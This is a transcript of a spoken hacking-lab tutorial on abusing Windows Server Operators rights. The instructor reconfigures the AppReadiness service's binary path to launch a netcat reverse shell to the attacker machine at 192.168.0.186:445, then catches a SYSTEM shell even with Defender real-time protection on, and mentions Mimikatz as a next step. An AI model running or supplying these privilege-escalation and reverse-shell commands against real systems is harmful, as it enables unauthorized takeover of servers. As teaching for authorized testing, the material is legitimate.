All right, so now we're going to be looking at server operators. So we've already done our UAC bypass. So we already have all of my rights and everything like that. Let's go ahead and open up command prompt and let's start looking for some different services. So we can do on PowerShell here, we can actually do a get service. We can see all different services that we have, if they're running, if they're stopped, all right, or started and stopped, whatever, however we want to call it. Okay, but we're going to be messing with today is app readiness. So we have the stop service of app readiness like right here. So let's go ahead and mess with that. All right, so we'll head over to my command prompt here. Let me go ahead and make that a little bit bigger for you all. And from here, what we can do is we do an SCQC app readiness. Now, I've already been messing with this machine, so that will not be your binary path. If you were to exploit this in real life, first off, get confirmation from the organization that you are testing. And secondly, make sure that you copy and save their binary path name. All right, you don't want it to run whatever you want every single time. I was kind of messing around with stuff, seeing what I could do with it. So let's go ahead and let's take this, and what we're actually going to do is we're going to change the binary path. So once we start that service up, something else runs. The service is going to fail. It'll fail, but it'll try to at least run what we put in there, right? So what we can do with that is we can actually do an sc config app readiness. So we'll do a, let's see here, sc config app readiness. Okay, and what that's just saying, that's just we're just going to configure the binary path for that. All right, so we're just going to say bin path equals, and then we'll put our little quotation marks in there. Okay, and all we want to do is we just want to give it some type of command, something to equal, something to run, right? So I believe that actually is, we can actually try this. dir on ctemp, is that still there? It is. So let's go ahead and let's try to do a, I've never tried this one before. sc config app readiness. It won't really do much. Well, it does open up as system, so it might actually do something for us. And we'll say ctemp or command /c, right? Then we'll say ctemp nc64.exe. Then we'll say, and then we'll give it our IP address for Cali, right? So let's go ahead and hop back over to here. Like I've said, I never really tried it like this before. I've always just ran something to make myself like an administrator or something like that, but we can always try different ways, right? There we go. Okay, we'll do an ifconfig, right? So we got 192.168.0.186. I think I actually remembered that. So we'll actually say 192.168.0.186, and then we're going to say on port, we'll say 445, and then we'll say, hey, I want the, I believe it's TAC A, if I remember correctly. It's either TAC A or TAC O. I can never remember with netcat. Let me see here. See if I can find a command where I used it real quick, just so I don't have to type in the command multiple times. TAC E, there we go. TAC E, command prompt, right? So we want to say command prompt back to there. We hit enter here, and we get access denied, although we are server operators, correct? Oh, group used for deny only. So yes, it was 100% correct. Access is denied. That is 100% correct, right? Let's go ahead and type in that, save that command over in the PowerShell, or let's go ahead and actually exit out of here. Because if we actually look at this, we'll copy that. Group used for deny only. That's not very helpful now, is it? No, we'll exit out of here. And if I do a who am I / all over here, we should actually be in that group again. We are. Okay. So let's go ahead and run that same command over here. All right. We'll say enter. Episode bin path equals. All right. I might need something else in there. I have to think for a second, or just look at the student notes that we have here of how I've done this before. I always forget this one. I think at bin path, I think I might have to actually make it bin path with a capital P. I don't remember though. But that should be sc config app readiness. Yeah, bin path equals. I'm pretty sure it's because I'm writing it in command prompt. And okay, there we go. Now we're much better off now. There we go. Just go to command prompt from our PowerShell there. And let me go ahead and control V. There we go. Okay, let's try that. And we see that this change service is a success, correct? So that's good. Good news for us, right? So we now change that service up. Let's go ahead back over to Cali. We'll do an RL wrap. NC TAC LVMP port 445 there, right? Because that's what we called for when we're running this command, right? So what I think we should happen, I think we should get a system shell back if we do get a shell back. And to be able to start this now all we have to do is tell it to start that app readiness service, right? So we just have to do an SC start app readiness. And it should fail. It might actually hang because we're getting a shell. So we might actually get it to hang like it is. And we do get a shell back. Who am I? And I am NT Authority System. So that's what we can do with a server operator, right? We can obviously make a shell back to ourselves like we just did. We're utilizing a netcat or probably like any type of a PowerShell script, anything like that, right? We could change users' permissions. We can change users' passwords, whatever we want to do, whatever we can run within command prompt or PowerShell, we can run on that server operator. So that is server operator with those privileges and how to exploit them. Hopefully y'all learned something. I know I just did. I don't think I've ever done it that way before with making a reverse shell back speed. Didn't know if it would actually just hang, if it would just stop, if it would actually go through. Had no idea what would actually happen there, but it looks like we got just fine. One more thing I want to test actually before we exit out this video, since I just did my little outro like right there, is let's go ahead and I think on Defender it's shut off like right now. Let's turn on real-time protection and let's try this again. Right, so let's go ahead and we'll stop this over here. All right, we'll go ahead and we'll start that back up again. Boom, boom. Okay, let's try that SC start app readiness again. And it looks like we still get that shell back to us, it looks like. And we do. All right, cool. So even with real-time protection turned on, we still get that shell because nc64.exe doesn't look bad. And it looks like we also have all of our privileges that we would normally have, right? So we don't have anything group use for deny by default or anything like that. Group use for deny only. We don't have anything like that on there, right? We are a local administrator. So from here, we should be able to do whatever we want. I don't know if we can go into PowerShell or not. We can. Okay, so we can, get our Mimikatz, whatever else we want to do, and then go ahead and attack that system. All right, so yep, that was a fun lesson. Had fun teaching that one. Hopefully you all had fun, and I'll talk to you all later.